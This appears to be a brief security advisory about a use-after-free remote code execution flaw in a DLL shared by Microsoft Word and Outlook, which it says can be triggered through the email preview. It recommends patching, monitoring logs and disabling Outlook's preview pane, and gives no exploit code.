A critical use-after-free vulnerability in Microsoft Office permits unauthorized remote code execution, with potential for zero-click exploitation via email preview.

This is a use-after-free vulnerability residing in a shared DLL used by Word and Outlook. An unauthenticated attacker could trigger this flaw, potentially leading to remote code execution through manipulated content, such as an email preview.

The vulnerability carries a CVSS score of 8.4, classifying it as High severity due to the potential for full system compromise. Successful exploitation grants attackers the ability to execute arbitrary code, which could lead to data exfiltration, ransomware deployment, or unauthorized access to sensitive internal communications.

Immediate Action: Apply the relevant security updates provided by Microsoft immediately, ensuring all Office builds are updated to the versions specified in the vendor advisory.

Proactive Monitoring: Review Outlook and Word access logs for anomalous behavior or unexpected process execution patterns that may indicate exploit attempts.

Compensating Controls: Disable the automatic preview pane in Outlook as a temporary measure to reduce the attack surface for potential zero-click vectors.

Public Exploit Available: True

Due to the availability of public exploits and the high-severity nature of the use-after-free flaw, immediate patching is required. Organizations should prioritize updates across all workstations and servers running the affected Microsoft Office versions to prevent potential system compromise.